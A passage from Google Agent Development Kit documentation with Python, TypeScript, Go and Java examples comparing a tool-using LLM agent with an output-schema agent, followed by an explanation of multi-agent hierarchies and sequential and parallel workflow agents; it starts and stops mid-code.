""", tools=[get_capital_city], input_schema=CountryInput, output_key="capital_tool_result", # Store final text response ) # Agent 2: Uses output_schema (NO tools possible) structured_info_agent_schema = LlmAgent( model=MODEL_NAME, name="structured_info_agent_schema", description="Provides capital and estimated population in a specific JSON format.", instruction=f"""You are an agent that provides country information. The user will provide the country name in a JSON format like {{"country": "country_name"}}. Respond ONLY with a JSON object matching this exact schema: {json.dumps(CapitalInfoOutput.model_json_schema(), indent=2)} Use your knowledge to determine the capital and estimate the population. Do not use any tools. """, # *** NO tools parameter here - using output_schema prevents tool use *** input_schema=CountryInput, output_schema=CapitalInfoOutput, # Enforce JSON output structure output_key="structured_info_result", # Store final JSON response ) # --- 5. Set up Session Management and Runners --- session_service = InMemorySessionService() # Create a runner for EACH agent capital_runner = Runner( agent=capital_agent_with_tool, app_name=APP_NAME, session_service=session_service ) structured_runner = Runner( agent=structured_info_agent_schema, app_name=APP_NAME, session_service=session_service ) # --- 6. Define Agent Interaction Logic --- async def call_agent_and_print( runner_instance: Runner, agent_instance: LlmAgent, session_id: str, query_json: str ): """Sends a query to the specified agent/runner and prints results.""" print(f"\n>>> Calling Agent: '{agent_instance.name}' | Query: {query_json}") user_content = types.Content(role='user', parts=[types.Part(text=query_json)]) final_response_content = "No final response received." 
async for event in runner_instance.run_async(user_id=USER_ID, session_id=session_id, new_message=user_content): # print(f"Event: {event.type}, Author: {event.author}") # Uncomment for detailed logging if event.is_final_response() and event.content and event.content.parts: # For output_schema, the content is the JSON string itself final_response_content = event.content.parts[0].text print(f"<<< Agent '{agent_instance.name}' Response: {final_response_content}") current_session = await session_service.get_session(app_name=APP_NAME, user_id=USER_ID, session_id=session_id) stored_output = current_session.state.get(agent_instance.output_key) # Pretty print if the stored output looks like JSON (likely from output_schema) print(f"--- Session State ['{agent_instance.output_key}']: ", end="") try: # Attempt to parse and pretty print if it's JSON parsed_output = json.loads(stored_output) print(json.dumps(parsed_output, indent=2)) except (json.JSONDecodeError, TypeError): # Otherwise, print as string print(stored_output) print("-" * 30) # --- 7. 
Run Interactions --- async def main(): # Create separate sessions for clarity, though not strictly necessary if context is managed print("--- Creating Sessions ---") await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID_TOOL_AGENT) await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID_SCHEMA_AGENT) print("--- Testing Agent with Tool ---") await call_agent_and_print(capital_runner, capital_agent_with_tool, SESSION_ID_TOOL_AGENT, '{"country": "France"}') await call_agent_and_print(capital_runner, capital_agent_with_tool, SESSION_ID_TOOL_AGENT, '{"country": "Canada"}') print("\n\n--- Testing Agent with Output Schema (No Tool Use) ---") await call_agent_and_print(structured_runner, structured_info_agent_schema, SESSION_ID_SCHEMA_AGENT, '{"country": "France"}') await call_agent_and_print(structured_runner, structured_info_agent_schema, SESSION_ID_SCHEMA_AGENT, '{"country": "Japan"}') # --- Run the Agent --- # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. if __name__ == "__main__": asyncio.run(main()) ``` ```typescript // Copyright 2025 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License.
import { LlmAgent, FunctionTool, InMemoryRunner, isFinalResponse } from '@google/adk'; import { createUserContent, Schema, Type } from '@google/genai'; import type { Part } from '@google/genai'; import { z } from 'zod'; // --- 1. Define Constants --- const APP_NAME = "capital_app_ts"; const USER_ID = "test_user_789"; const SESSION_ID_TOOL_AGENT = "session_tool_agent_ts"; const SESSION_ID_SCHEMA_AGENT = "session_schema_agent_ts"; const MODEL_NAME = "gemini-2.5-flash"; // Using flash for speed // --- 2. Define Schemas --- // A. Schema for the Tool's parameters (using Zod) const CountryInput = z.object({ country: z.string().describe('The country to get the capital for.'), }); // B. Output schema ONLY for the second agent (using the Schema type from @google/genai) const CapitalInfoOutputSchema: Schema = { type: Type.OBJECT, description: "Schema for capital city information.", properties: { capital: { type: Type.STRING, description: "The capital city of the country." }, population_estimate: { type: Type.STRING, description: "An estimated population of the capital city." }, }, required: ["capital", "population_estimate"], }; // --- 3. Define the Tool (Only for the first agent) --- async function getCapitalCity(params: z.infer<typeof CountryInput>): Promise<{ result: string }> { console.log(`\n-- Tool Call: getCapitalCity(country='${params.country}') --`); const capitals: Record<string, string> = { 'united states': 'Washington, D.C.', 'canada': 'Ottawa', 'france': 'Paris', 'japan': 'Tokyo', }; const result = capitals[params.country.toLowerCase()] ?? `Sorry, I couldn't find the capital for ${params.country}.`; console.log(`-- Tool Result: '${result}' --`); return { result: result }; // Tools must return an object } // --- 4.
Configure Agents --- // Agent 1: Uses a tool and outputKey const getCapitalCityTool = new FunctionTool({ name: 'get_capital_city', description: 'Retrieves the capital city for a given country', parameters: CountryInput, execute: getCapitalCity, }); const capitalAgentWithTool = new LlmAgent({ model: MODEL_NAME, name: 'capital_agent_tool', description: 'Retrieves the capital city using a specific tool.', instruction: `You are a helpful agent that provides the capital city of a country using a tool. The user will provide the country name in a JSON format like {"country": "country_name"}. 1. Extract the country name. 2. Use the \`get_capital_city\` tool to find the capital. 3. Respond with a JSON object with the key 'capital' and the value as the capital city. `, tools: [getCapitalCityTool], outputKey: "capital_tool_result", // Store final text response }); // Agent 2: Uses outputSchema (NO tools possible) const structuredInfoAgentSchema = new LlmAgent({ model: MODEL_NAME, name: 'structured_info_agent_schema', description: 'Provides capital and estimated population in a specific JSON format.', instruction: `You are an agent that provides country information. The user will provide the country name in a JSON format like {"country": "country_name"}. Respond ONLY with a JSON object matching this exact schema: ${JSON.stringify(CapitalInfoOutputSchema, null, 2)} Use your knowledge to determine the capital and estimate the population. Do not use any tools. `, // *** NO tools parameter here - using outputSchema prevents tool use *** outputSchema: CapitalInfoOutputSchema, outputKey: "structured_info_result", }); // --- 5. 
Define Agent Interaction Logic --- async function callAgentAndPrint( runner: InMemoryRunner, agent: LlmAgent, sessionId: string, queryJson: string ) { console.log(`\n>>> Calling Agent: '${agent.name}' | Query: ${queryJson}`); const message = createUserContent(queryJson); let finalResponseContent = "No final response received."; for await (const event of runner.runAsync({ userId: USER_ID, sessionId: sessionId, newMessage: message })) { if (isFinalResponse(event) && event.content?.parts?.length) { finalResponseContent = event.content.parts.map((part: Part) => part.text ?? '').join(''); } } console.log(`<<< Agent '${agent.name}' Response: ${finalResponseContent}`); // Check the session state const currentSession = await runner.sessionService.getSession({ appName: APP_NAME, userId: USER_ID, sessionId: sessionId }); if (!currentSession) { console.log(`--- Session not found: ${sessionId} ---`); return; } const storedOutput = currentSession.state[agent.outputKey!]; console.log(`--- Session State ['${agent.outputKey}']: `); try { // Attempt to parse and pretty print if it's JSON const parsedOutput = JSON.parse(storedOutput as string); console.log(JSON.stringify(parsedOutput, null, 2)); } catch (e) { // Otherwise, print as a string console.log(storedOutput); } console.log("-".repeat(30)); } // --- 6. 
Run Interactions --- async function main() { // Set up runners for each agent const capitalRunner = new InMemoryRunner({ appName: APP_NAME, agent: capitalAgentWithTool }); const structuredRunner = new InMemoryRunner({ appName: APP_NAME, agent: structuredInfoAgentSchema }); // Create sessions console.log("--- Creating Sessions ---"); await capitalRunner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_TOOL_AGENT }); await structuredRunner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_SCHEMA_AGENT }); console.log("\n--- Testing Agent with Tool ---"); await callAgentAndPrint(capitalRunner, capitalAgentWithTool, SESSION_ID_TOOL_AGENT, '{"country": "France"}'); await callAgentAndPrint(capitalRunner, capitalAgentWithTool, SESSION_ID_TOOL_AGENT, '{"country": "Canada"}'); console.log("\n\n--- Testing Agent with Output Schema (No Tool Use) ---"); await callAgentAndPrint(structuredRunner, structuredInfoAgentSchema, SESSION_ID_SCHEMA_AGENT, '{"country": "France"}'); await callAgentAndPrint(structuredRunner, structuredInfoAgentSchema, SESSION_ID_SCHEMA_AGENT, '{"country": "Japan"}'); } main(); ``` ```go package main import ( "context" "encoding/json" "errors" "fmt" "log" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) // --- Main Runnable Example --- const ( modelName = "gemini-2.0-flash" appName = "agent_comparison_app" userID = "test_user_456" ) type getCapitalCityArgs struct { Country string `json:"country" jsonschema:"The country to get the capital of."` } // getCapitalCity retrieves the capital city of a given country. 
func getCapitalCity(ctx tool.Context, args getCapitalCityArgs) (map[string]any, error) {
	fmt.Printf("\n-- Tool Call: getCapitalCity(country='%s') --\n", args.Country)
	capitals := map[string]string{
		"united states": "Washington, D.C.",
		"canada":        "Ottawa",
		"france":        "Paris",
		"japan":         "Tokyo",
	}
	capital, ok := capitals[strings.ToLower(args.Country)]
	if !ok {
		result := fmt.Sprintf("Sorry, I couldn't find the capital for %s.", args.Country)
		fmt.Printf("-- Tool Result: '%s' --\n", result)
		return nil, errors.New(result)
	}

	fmt.Printf("-- Tool Result: '%s' --\n", capital)
	return map[string]any{"result": capital}, nil
}

// callAgent is a helper function to execute an agent with a given prompt and handle its output.
func callAgent(ctx context.Context, a agent.Agent, outputKey string, prompt string) {
	fmt.Printf("\n>>> Calling Agent: '%s' | Query: %s\n", a.Name(), prompt)

	// Create an in-memory session service to manage agent state.
	sessionService := session.InMemoryService()

	// Create a new session for the agent interaction.
	sessionCreateResponse, err := sessionService.Create(ctx, &session.CreateRequest{
		AppName: appName,
		UserID:  userID,
	})
	if err != nil {
		log.Fatalf("Failed to create the session: %v", err)
	}

	session := sessionCreateResponse.Session

	// Configure the runner with the application name, agent, and session service.
	config := runner.Config{
		AppName:        appName,
		Agent:          a,
		SessionService: sessionService,
	}

	// Create a new runner instance.
	r, err := runner.New(config)
	if err != nil {
		log.Fatalf("Failed to create the runner: %v", err)
	}

	// Prepare the user's message to send to the agent.
	sessionID := session.ID()
	userMsg := &genai.Content{
		Parts: []*genai.Part{
			genai.NewPartFromText(prompt),
		},
		Role: string(genai.RoleUser),
	}

	// Run the agent and process the streaming events.
	for event, err := range r.Run(ctx, userID, sessionID, userMsg, agent.RunConfig{
		StreamingMode: agent.StreamingModeSSE,
	}) {
		if err != nil {
			fmt.Printf("\nAGENT_ERROR: %v\n", err)
		} else if event.Partial {
			// Print partial responses as they are received.
			for _, p := range event.Content.Parts {
				fmt.Print(p.Text)
			}
		}
	}

	// After the run, check if there's an expected output key in the session state.
	if outputKey != "" {
		storedOutput, err := session.State().Get(outputKey)
		if err == nil {
			// Pretty-print the stored output if it's a JSON string.
			fmt.Printf("\n--- Session State ['%s']: ", outputKey)
			storedString, isString := storedOutput.(string)
			if isString {
				var prettyJSON map[string]interface{}
				if err := json.Unmarshal([]byte(storedString), &prettyJSON); err == nil {
					indentedJSON, err := json.MarshalIndent(prettyJSON, "", "  ")
					if err == nil {
						fmt.Println(string(indentedJSON))
					} else {
						fmt.Println(storedString)
					}
				} else {
					fmt.Println(storedString)
				}
			} else {
				fmt.Println(storedOutput)
			}
			fmt.Println(strings.Repeat("-", 30))
		}
	}
}

func main() {
	ctx := context.Background()

	model, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{})
	if err != nil {
		log.Fatalf("Failed to create model: %v", err)
	}

	capitalTool, err := functiontool.New(
		functiontool.Config{
			Name:        "get_capital_city",
			Description: "Retrieves the capital city for a given country.",
		},
		getCapitalCity,
	)
	if err != nil {
		log.Fatalf("Failed to create function tool: %v", err)
	}

	countryInputSchema := &genai.Schema{
		Type:        genai.TypeObject,
		Description: "Input for specifying a country.",
		Properties: map[string]*genai.Schema{
			"country": {
				Type:        genai.TypeString,
				Description: "The country to get information about.",
			},
		},
		Required: []string{"country"},
	}

	capitalAgentWithTool, err := llmagent.New(llmagent.Config{
		Name:        "capital_agent_tool",
		Model:       model,
		Description: "Retrieves the capital city using a specific tool.",
		Instruction: `You are a helpful agent that provides the capital city of a country using a tool.
The user will provide the country name in a JSON format like {"country": "country_name"}.
1. Extract the country name.
2. Use the 'get_capital_city' tool to find the capital.
3. Respond clearly to the user, stating the capital city found by the tool.`,
		Tools:       []tool.Tool{capitalTool},
		InputSchema: countryInputSchema,
		OutputKey:   "capital_tool_result",
	})
	if err != nil {
		log.Fatalf("Failed to create capital agent with tool: %v", err)
	}

	capitalInfoOutputSchema := &genai.Schema{
		Type:        genai.TypeObject,
		Description: "Schema for capital city information.",
		Properties: map[string]*genai.Schema{
			"capital": {
				Type:        genai.TypeString,
				Description: "The capital city of the country.",
			},
			"population_estimate": {
				Type:        genai.TypeString,
				Description: "An estimated population of the capital city.",
			},
		},
		Required: []string{"capital", "population_estimate"},
	}

	schemaJSON, _ := json.Marshal(capitalInfoOutputSchema)
	structuredInfoAgentSchema, err := llmagent.New(llmagent.Config{
		Name:        "structured_info_agent_schema",
		Model:       model,
		Description: "Provides capital and estimated population in a specific JSON format.",
		Instruction: fmt.Sprintf(`You are an agent that provides country information.
The user will provide the country name in a JSON format like {"country": "country_name"}.
Respond ONLY with a JSON object matching this exact schema:
%s
Use your knowledge to determine the capital and estimate the population.
Do not use any tools.`, string(schemaJSON)),
		InputSchema:  countryInputSchema,
		OutputSchema: capitalInfoOutputSchema,
		OutputKey:    "structured_info_result",
	})
	if err != nil {
		log.Fatalf("Failed to create structured info agent: %v", err)
	}

	fmt.Println("--- Testing Agent with Tool ---")
	callAgent(ctx, capitalAgentWithTool, "capital_tool_result", `{"country": "France"}`)
	callAgent(ctx, capitalAgentWithTool, "capital_tool_result", `{"country": "Canada"}`)

	fmt.Println("\n\n--- Testing Agent with Output Schema (No Tool Use) ---")
	callAgent(ctx, structuredInfoAgentSchema, "structured_info_result", `{"country": "France"}`)
	callAgent(ctx, structuredInfoAgentSchema, "structured_info_result", `{"country": "Japan"}`)
}
```

```java
// --- Full example code demonstrating LlmAgent with Tools vs. Output Schema ---
import com.google.adk.agents.LlmAgent;
import com.google.adk.events.Event;
import com.google.adk.runner.Runner;
import com.google.adk.sessions.InMemorySessionService;
import com.google.adk.sessions.Session;
import com.google.adk.tools.Annotations;
import com.google.adk.tools.FunctionTool;
import com.google.genai.types.Content;
import com.google.genai.types.Part;
import com.google.genai.types.Schema;
import io.reactivex.rxjava3.core.Flowable;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Optional;

public class LlmAgentExample {

  // --- 1. Define Constants ---
  private static final String MODEL_NAME = "gemini-2.0-flash";
  private static final String APP_NAME = "capital_agent_tool";
  private static final String USER_ID = "test_user_456";
  private static final String SESSION_ID_TOOL_AGENT = "session_tool_agent_xyz";
  private static final String SESSION_ID_SCHEMA_AGENT = "session_schema_agent_xyz";

  // --- 2. Define Schemas ---

  // Input schema used by both agents
  private static final Schema COUNTRY_INPUT_SCHEMA =
      Schema.builder()
          .type("OBJECT")
          .description("Input for specifying a country.")
          .properties(
              Map.of(
                  "country",
                  Schema.builder()
                      .type("STRING")
                      .description("The country to get information about.")
                      .build()))
          .required(List.of("country"))
          .build();

  // Output schema ONLY for the second agent
  private static final Schema CAPITAL_INFO_OUTPUT_SCHEMA =
      Schema.builder()
          .type("OBJECT")
          .description("Schema for capital city information.")
          .properties(
              Map.of(
                  "capital",
                  Schema.builder()
                      .type("STRING")
                      .description("The capital city of the country.")
                      .build(),
                  "population_estimate",
                  Schema.builder()
                      .type("STRING")
                      .description("An estimated population of the capital city.")
                      .build()))
          .required(List.of("capital", "population_estimate"))
          .build();

  // --- 3. Define the Tool (Only for the first agent) ---
  // Retrieves the capital city of a given country.
  public static Map<String, Object> getCapitalCity(
      @Annotations.Schema(name = "country", description = "The country to get capital for")
      String country) {
    System.out.printf("%n-- Tool Call: getCapitalCity(country='%s') --%n", country);
    Map<String, String> countryCapitals = new HashMap<>();
    countryCapitals.put("united states", "Washington, D.C.");
    countryCapitals.put("canada", "Ottawa");
    countryCapitals.put("france", "Paris");
    countryCapitals.put("japan", "Tokyo");

    String result =
        countryCapitals.getOrDefault(
            country.toLowerCase(), "Sorry, I couldn't find the capital for " + country + ".");
    System.out.printf("-- Tool Result: '%s' --%n", result);
    return Map.of("result", result); // Tools must return a Map
  }

  public static void main(String[] args){
    LlmAgentExample agentExample = new LlmAgentExample();
    FunctionTool capitalTool = FunctionTool.create(agentExample.getClass(), "getCapitalCity");

    // --- 4. Configure Agents ---
    // Agent 1: Uses a tool and output_key
    LlmAgent capitalAgentWithTool =
        LlmAgent.builder()
            .model(MODEL_NAME)
            .name("capital_agent_tool")
            .description("Retrieves the capital city using a specific tool.")
            .instruction(
                """
                You are a helpful agent that provides the capital city of a country using a tool.
                1. Extract the country name.
                2. Use the `get_capital_city` tool to find the capital.
                3. Respond clearly to the user, stating the capital city found by the tool.
                """)
            .tools(capitalTool)
            .inputSchema(COUNTRY_INPUT_SCHEMA)
            .outputKey("capital_tool_result") // Store final text response
            .build();

    // Agent 2: Uses an output schema
    LlmAgent structuredInfoAgentSchema =
        LlmAgent.builder()
            .model(MODEL_NAME)
            .name("structured_info_agent_schema")
            .description("Provides capital and estimated population in a specific JSON format.")
            .instruction(
                String.format("""
                You are an agent that provides country information.
                Respond ONLY with a JSON object matching this exact schema: %s
                Use your knowledge to determine the capital and estimate the population.
                Do not use any tools.
                """, CAPITAL_INFO_OUTPUT_SCHEMA.toJson()))
            // *** NO tools parameter here - using output_schema prevents tool use ***
            .inputSchema(COUNTRY_INPUT_SCHEMA)
            .outputSchema(CAPITAL_INFO_OUTPUT_SCHEMA) // Enforce JSON output structure
            .outputKey("structured_info_result") // Store final JSON response
            .build();

    // --- 5. Set up Session Management and Runners ---
    InMemorySessionService sessionService = new InMemorySessionService();

    sessionService.createSession(APP_NAME, USER_ID, null, SESSION_ID_TOOL_AGENT).blockingGet();
    sessionService.createSession(APP_NAME, USER_ID, null, SESSION_ID_SCHEMA_AGENT).blockingGet();

    Runner capitalRunner = new Runner(capitalAgentWithTool, APP_NAME, null, sessionService);
    Runner structuredRunner = new Runner(structuredInfoAgentSchema, APP_NAME, null, sessionService);

    // --- 6. Run Interactions ---
    System.out.println("--- Testing Agent with Tool ---");
    agentExample.callAgentAndPrint(
        capitalRunner, capitalAgentWithTool, SESSION_ID_TOOL_AGENT, "{\"country\": \"France\"}");
    agentExample.callAgentAndPrint(
        capitalRunner, capitalAgentWithTool, SESSION_ID_TOOL_AGENT, "{\"country\": \"Canada\"}");

    System.out.println("\n\n--- Testing Agent with Output Schema (No Tool Use) ---");
    agentExample.callAgentAndPrint(
        structuredRunner,
        structuredInfoAgentSchema,
        SESSION_ID_SCHEMA_AGENT,
        "{\"country\": \"France\"}");
    agentExample.callAgentAndPrint(
        structuredRunner,
        structuredInfoAgentSchema,
        SESSION_ID_SCHEMA_AGENT,
        "{\"country\": \"Japan\"}");
  }

  // --- 7. Define Agent Interaction Logic ---
  public void callAgentAndPrint(Runner runner, LlmAgent agent, String sessionId, String queryJson) {
    System.out.printf(
        "%n>>> Calling Agent: '%s' | Session: '%s' | Query: %s%n",
        agent.name(), sessionId, queryJson);

    Content userContent = Content.fromParts(Part.fromText(queryJson));
    final String[] finalResponseContent = {"No final response received."};
    Flowable<Event> eventStream = runner.runAsync(USER_ID, sessionId, userContent);

    // Stream event response
    eventStream.blockingForEach(
        event -> {
          if (event.finalResponse() && event.content().isPresent()) {
            event
                .content()
                .get()
                .parts()
                .flatMap(parts -> parts.isEmpty() ?
                    Optional.empty() : Optional.of(parts.get(0)))
                .flatMap(Part::text)
                .ifPresent(text -> finalResponseContent[0] = text);
          }
        });

    System.out.printf("<<< Agent '%s' Response: %s%n", agent.name(), finalResponseContent[0]);

    // Retrieve the session again to get the updated state
    Session updatedSession =
        runner
            .sessionService()
            .getSession(APP_NAME, USER_ID, sessionId, Optional.empty())
            .blockingGet();

    if (updatedSession != null && agent.outputKey().isPresent()) {
      // Print to verify if the stored output looks like JSON (likely from output_schema)
      System.out.printf("--- Session State ['%s']: ", agent.outputKey().get());
      System.out.println(updatedSession.state().get(agent.outputKey().get()));
    }
  }
}
```

*(This example demonstrates the core concepts. More complex agents might incorporate schemas, context control, planning, etc.)*

## Related Concepts (Deferred Topics)

While this page covers the core configuration of `LlmAgent`, several related concepts provide more advanced control and are detailed elsewhere:

- **Callbacks:** Intercepting execution points (before/after model calls, before/after tool calls) using `before_model_callback`, `after_model_callback`, etc. See [Callbacks](https://google.github.io/adk-docs/callbacks/types-of-callbacks/index.md).
- **Multi-Agent Control:** Advanced strategies for agent interaction, including planning (`planner`), controlling agent transfer (`disallow_transfer_to_parent`, `disallow_transfer_to_peers`), and system-wide instructions (`global_instruction`). See [Multi-Agents](https://google.github.io/adk-docs/agents/multi-agents/index.md).

# Multi-Agent Systems in ADK

Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.1.0

As agentic applications grow in complexity, structuring them as a single, monolithic agent can become challenging to develop, maintain, and reason about. The Agent Development Kit (ADK) supports building sophisticated applications by composing multiple, distinct `BaseAgent` instances into a **Multi-Agent System (MAS)**.
In ADK, a multi-agent system is an application where different agents, often forming a hierarchy, collaborate or coordinate to achieve a larger goal. Structuring your application this way offers significant advantages, including enhanced modularity, specialization, reusability, maintainability, and the ability to define structured control flows using dedicated workflow agents.

You can compose various types of agents derived from `BaseAgent` to build these systems:

- **LLM Agents:** Agents powered by large language models. (See [LLM Agents](https://google.github.io/adk-docs/agents/llm-agents/index.md))
- **Workflow Agents:** Specialized agents (`SequentialAgent`, `ParallelAgent`, `LoopAgent`) designed to manage the execution flow of their sub-agents. (See [Workflow Agents](https://google.github.io/adk-docs/agents/workflow-agents/index.md))
- **Custom agents:** Your own agents inheriting from `BaseAgent` with specialized, non-LLM logic. (See [Custom Agents](https://google.github.io/adk-docs/agents/custom-agents/index.md))

The following sections detail the core ADK primitives (agent hierarchy, workflow agents, and interaction mechanisms) that enable you to construct and manage these multi-agent systems effectively.

## 1. ADK Primitives for Agent Composition

ADK provides core building blocks, called primitives, that enable you to structure and manage interactions within your multi-agent system.

**Note:** The specific parameters or method names for the primitives may vary slightly by SDK language (e.g., `sub_agents` in Python, `subAgents` in Java). Refer to the language-specific API documentation for details.

### 1.1. Agent Hierarchy (Parent agent, Sub Agents)

The foundation for structuring multi-agent systems is the parent-child relationship defined in `BaseAgent`.

- **Establishing Hierarchy:** You create a tree structure by passing a list of agent instances to the `sub_agents` argument when initializing a parent agent.
  ADK automatically sets the `parent_agent` attribute on each child agent during initialization.
- **Single Parent Rule:** An agent instance can only be added as a sub-agent once. Attempting to assign a second parent will result in a `ValueError`.
- **Importance:** This hierarchy defines the scope for [Workflow Agents](#workflow-agents-as-orchestrators) and influences the potential targets for LLM-Driven Delegation. You can navigate the hierarchy using `agent.parent_agent` or find descendants using `agent.find_agent(name)`.

```python
# Conceptual Example: Defining Hierarchy
from google.adk.agents import LlmAgent, BaseAgent

# Define individual agents
greeter = LlmAgent(name="Greeter", model="gemini-2.0-flash")
task_doer = BaseAgent(name="TaskExecutor") # Custom non-LLM agent

# Create parent agent and assign children via sub_agents
coordinator = LlmAgent(
    name="Coordinator",
    model="gemini-2.0-flash",
    description="I coordinate greetings and tasks.",
    sub_agents=[ # Assign sub_agents here
        greeter,
        task_doer
    ]
)

# Framework automatically sets:
# assert greeter.parent_agent == coordinator
# assert task_doer.parent_agent == coordinator
```

```typescript
// Conceptual Example: Defining Hierarchy
import { LlmAgent, BaseAgent, InvocationContext, createEventActions } from '@google/adk';
import type { Event } from '@google/adk';

class TaskExecutorAgent extends BaseAgent {
  async *runAsyncImpl(context: InvocationContext): AsyncGenerator<Event, void, void> {
    yield {
      id: 'event-1',
      invocationId: context.invocationId,
      author: this.name,
      content: { parts: [{ text: 'Task completed!' }] },
      actions: createEventActions(),
      timestamp: Date.now(),
    };
  }

  async *runLiveImpl(context: InvocationContext): AsyncGenerator<Event, void, void> {
    // Delegate to the async implementation so its events are actually yielded.
    yield* this.runAsyncImpl(context);
  }
}

// Define individual agents
const greeter = new LlmAgent({name: 'Greeter', model: 'gemini-2.5-flash'});
const taskDoer = new TaskExecutorAgent({name: 'TaskExecutor'}); // Custom non-LLM agent

// Create parent agent and assign children via subAgents
const coordinator = new LlmAgent({
    name: 'Coordinator',
    model: 'gemini-2.5-flash',
    description: 'I coordinate greetings and tasks.',
    subAgents: [ // Assign subAgents here
        greeter,
        taskDoer
    ],
});

// Framework automatically sets:
// console.assert(greeter.parentAgent === coordinator);
// console.assert(taskDoer.parentAgent === coordinator);
```

```go
import (
	"google.golang.org/adk/agent"
	"google.golang.org/adk/agent/llmagent"
)

// Conceptual Example: Defining Hierarchy
// Define individual agents
greeter, _ := llmagent.New(llmagent.Config{Name: "Greeter", Model: m})
taskDoer, _ := agent.New(agent.Config{Name: "TaskExecutor"}) // Custom non-LLM agent

// Create parent agent and assign children via SubAgents
coordinator, _ := llmagent.New(llmagent.Config{
	Name:        "Coordinator",
	Model:       m,
	Description: "I coordinate greetings and tasks.",
	SubAgents:   []agent.Agent{greeter, taskDoer}, // Assign sub-agents here
})
```

```java
// Conceptual Example: Defining Hierarchy
import com.google.adk.agents.SequentialAgent;
import com.google.adk.agents.LlmAgent;

// Define individual agents
LlmAgent greeter = LlmAgent.builder().name("Greeter").model("gemini-2.0-flash").build();
SequentialAgent taskDoer = SequentialAgent.builder().name("TaskExecutor").subAgents(...).build(); // Sequential Agent

// Create parent agent and assign sub_agents
LlmAgent coordinator = LlmAgent.builder()
    .name("Coordinator")
    .model("gemini-2.0-flash")
    .description("I coordinate greetings and tasks")
    .subAgents(greeter, taskDoer) // Assign sub_agents here
    .build();

// Framework automatically sets:
// assert greeter.parentAgent().equals(coordinator);
// assert taskDoer.parentAgent().equals(coordinator);
```

### 1.2. Workflow Agents as Orchestrators

ADK includes specialized agents derived from `BaseAgent` that don't perform tasks themselves but orchestrate the execution flow of their `sub_agents`.

- **[`SequentialAgent`](https://google.github.io/adk-docs/agents/workflow-agents/sequential-agents/index.md):** Executes its `sub_agents` one after another in the order they are listed.
    - **Context:** Passes the *same* [`InvocationContext`](https://google.github.io/adk-docs/runtime/index.md) sequentially, allowing agents to easily pass results via shared state.

```python
# Conceptual Example: Sequential Pipeline
from google.adk.agents import SequentialAgent, LlmAgent

step1 = LlmAgent(name="Step1_Fetch", output_key="data") # Saves output to state['data']
step2 = LlmAgent(name="Step2_Process", instruction="Process data from {data}.")

pipeline = SequentialAgent(name="MyPipeline", sub_agents=[step1, step2])
# When pipeline runs, Step2 can access the state['data'] set by Step1.
```

```typescript
// Conceptual Example: Sequential Pipeline
import { SequentialAgent, LlmAgent } from '@google/adk';

const step1 = new LlmAgent({name: 'Step1_Fetch', outputKey: 'data'}); // Saves output to state['data']
const step2 = new LlmAgent({name: 'Step2_Process', instruction: 'Process data from {data}.'});

const pipeline = new SequentialAgent({name: 'MyPipeline', subAgents: [step1, step2]});
// When pipeline runs, Step2 can access the state['data'] set by Step1.
```

```go
import (
	"google.golang.org/adk/agent"
	"google.golang.org/adk/agent/llmagent"
	"google.golang.org/adk/agent/workflowagents/sequentialagent"
)

// Conceptual Example: Sequential Pipeline
step1, _ := llmagent.New(llmagent.Config{Name: "Step1_Fetch", OutputKey: "data", Model: m}) // Saves output to state["data"]
step2, _ := llmagent.New(llmagent.Config{Name: "Step2_Process", Instruction: "Process data from {data}.", Model: m})

pipeline, _ := sequentialagent.New(sequentialagent.Config{
	AgentConfig: agent.Config{Name: "MyPipeline", SubAgents: []agent.Agent{step1, step2}},
})
// When pipeline runs, Step2 can access the state["data"] set by Step1.
```

```java
// Conceptual Example: Sequential Pipeline
import com.google.adk.agents.SequentialAgent;
import com.google.adk.agents.LlmAgent;

LlmAgent step1 = LlmAgent.builder().name("Step1_Fetch").outputKey("data").build(); // Saves output to state.get("data")
LlmAgent step2 = LlmAgent.builder().name("Step2_Process").instruction("Process data from {data}.").build();

SequentialAgent pipeline = SequentialAgent.builder().name("MyPipeline").subAgents(step1, step2).build();
// When pipeline runs, Step2 can access the state.get("data") set by Step1.
```

- **[`ParallelAgent`](https://google.github.io/adk-docs/agents/workflow-agents/parallel-agents/index.md):** Executes its `sub_agents` in parallel. Events from sub-agents may be interleaved.
    - **Context:** Modifies the `InvocationContext.branch` for each child agent (e.g., `ParentBranch.ChildName`), providing a distinct contextual path which can be useful for isolating history in some memory implementations.
    - **State:** Despite different branches, all parallel children access the *same shared* `session.state`, enabling them to read initial state and write results (use distinct keys to avoid race conditions).
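
The shared-state behavior described above can be modeled without ADK. The following is a minimal plain-Python sketch, not ADK code: `fake_agent`, `run_parallel`, and the plain `state` dictionary are hypothetical stand-ins for sub-agents, `ParallelAgent`, and `session.state`, and the real scheduling inside ADK may differ. It shows concurrent workers that each receive a `Parent.Child` branch label and write to a distinct key of one shared dictionary.

```python
import asyncio


async def fake_agent(name: str, branch: str, output_key: str, state: dict) -> str:
    """Hypothetical stand-in for a sub-agent: does some work, then writes one key."""
    await asyncio.sleep(0)  # yield control so the workers can interleave
    state[output_key] = f"{name} result"
    return branch


async def run_parallel(parent: str, children: list, state: dict) -> list:
    """Hypothetical stand-in for ParallelAgent: run all children concurrently."""
    tasks = [
        fake_agent(name, f"{parent}.{name}", output_key, state)
        for name, output_key in children
    ]
    # gather() returns results in the order the tasks were passed in.
    return await asyncio.gather(*tasks)


state: dict = {}
branches = asyncio.run(
    run_parallel(
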